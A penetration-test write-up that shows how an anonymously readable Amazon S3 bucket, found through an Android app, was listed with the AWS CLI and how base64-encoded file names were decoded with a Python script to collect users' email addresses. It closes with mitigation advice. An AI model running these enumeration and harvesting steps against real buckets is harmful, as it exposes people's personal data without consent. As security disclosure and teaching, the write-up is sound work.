Exploiting S3 bucket misconfiguration to dump users emails

This page has writeup about how misconfigured Amazon S3 bucket was found leaking several users email and other docs in public domain.

While pentesting an android application I came across an S3 bucket URL, which was storing user's documents. First thing came on my mind was to first check if this bucket is misconfigured. If it's misconfigured then I'll get complete access to users documents.

I won't be covering how I found this S3 bucket while pentesting the app because my main focus is on applications designed these days lacks security considerations and developers use insecure methods to store data.

Checking If bucket is misconfigured

I'll be using AWS cli because it provides better control over the commands while enumerating buckets and other AWS infra rather than depending on the tools.

Installing AWS cli

$ sudo apt install python3 python3-pip -y
$ pip3 install awscli

Verify Installation

$ aws --version
aws-cli/1.27.45 Python/3.10.6 Linux/5.15.0-57-generic botocore/1.29.45

Checking if bucket is accessible anonymously

To interact with bucket we first need bucket name which can be found from URL, which is usually in format

https://bucket-name.s3.amazonaws.com/

check if bucket is accessible publicly using aws cli

$ aws s3 ls s3://bucket-name --no-sign-request 
                           PRE admin/
                           PRE bi/
                           PRE blog/
                           PRE campanhas/
                           PRE css/
                           PRE data/
                           PRE escolas/
                           PRE fonts/
                           PRE front-assets/
                           PRE front-cache/
                           PRE img/
                           PRE lib/
                           PRE lps/
                           PRE marketing/
                           PRE XXXXXXX-tech/
                           PRE ms-qrcode/
                           PRE outros/
                           PRE parcerias/
                           PRE plugins/
                           PRE pwa/
                           PRE redirects/
                           PRE removals/
                           PRE sales/
                           PRE study-plans/
                           PRE styles/
                           PRE tech-blog/
                           PRE tutoriais/
                           PRE uploads/
                           PRE video/
                           PRE wiris-service/
2019-10-29 02:36:17        404 favicon.ico
2022-12-01 00:38:53         96 robots.txt
2022-11-02 20:44:17      59383 sitemap.xml

Bucket is publicly accessible!!

We can enumerate each by going through each and every directory, but in this writeup my focus will be on dumping only users email ids which is due to insecure applicaiton design.

We can also check if bucket is publicly accessible by simply visiting homepage of bucket but sometimes buckets are misconfigured with access to users with any AWS account so by using AWS cli we can make requests using our AWS account.

Enumerating Through Directories and Dumping File names

User can enumerate through each and every directory for juicy information, but since from android app pentest I know where I can find user's information. All user uploaded docs are stored in uploads/essay_submission/essay directory of s3 bucket.

Now I'll be listing all the files inside uploads/essay_submission/essay and storing its output inside a text file.

aws s3 ls s3://bucket-name/uploads/essay_submission/essay/ --no-sign-request > submitted_essays.txt

Note / in the end of essay, if you want to access contents of directory on bucket, its important to use forward slash / at the end.

Let's tail data to understand how files are stored to analyze file names.

The design flaw exists in how are documents/images stored in bucket. All files name are in base64 encoded format allowing attacker to extract email ids from the file names which can be concluded after analyzing the output.

Extracting User Info from Dumped Data

Using awk and sed command line tools to extract only base64 encoded data

tail submitted_essays.txt | awk '{print $4}' | sed 's/[.].*$//'

awk is used to only print file names and sed allows us to get rid of .jpeg extension

Now let's extract all base64 encoded data and store it in another file base64data.txt

cat submitted_essays.txt | awk '{print $4}' | sed 's/[.].*$//' > base64data.txt

Decoding base64 Data Line by Line

I won't be using base64 command line utility to decode base64 data because I prefer python for doing such tasks and I can use that script again in future.

from base64 import b64decode
from os.path import isfile


def get_file_lines(file_path:str):
    assert isfile(file_path), f"File Not Found: {file_path}"

    file_lines = []
    with open(file_path, 'r') as f:
        file_lines = f.readlines()
    
    file_lines = [ line.strip() for line in file_lines]

    return file_lines


def decode_base64_list(file_lines:list[str]):
    decoded_lines = []
    for line in file_lines:
        decoded_lines.append(b64decode(line).decode('utf-8'))
    
    return decoded_lines


def write_file(file_path:str, file_lines:list[str]):
    with open(file_path, 'w') as f:
        data = '\n'.join(file_lines)
        f.write(data)


def main(file_path:str, save_file_path:str):
    encoded_file_lines = get_file_lines(file_path)
    decoded_file_lines = decode_base64_list(list(set(encoded_file_lines)))

    # sanitizing data
    ## remove ids
    sanitized_lines = []
    for line in set(decoded_file_lines):
        sanitized_lines.append(line[0:-13])

    ## write unique values to file
    write_file(save_file_path, sanitized_lines)

    # print some data on completion
    print(sanitized_lines[0:4])


if __name__ == '__main__':
    file_path = 'base64data.txt'
    decoded_file_path = 'user_data.txt'

    main(file_path, decoded_file_path)

Running script decode_data.py

python3 decode_data.py

Some data will be printed on screen after script has been executed successfully

Now, we have all user emails those who have uploaded their docs.

tail user_data.txt
wc -l user_data.txt

How to mitigate issue and develop better applications

  • User data exposed to public due to misconfigured security bucket. Buckets shouldn't be publicly accessible. Use presigned URLs for limited amount of time for accessing bucket object.

  • It's not secure to use user's details, uniquely indentifiable id for storing user's data instead developers should use uuids or salted hashes to generate names for assets/objects.

Last updated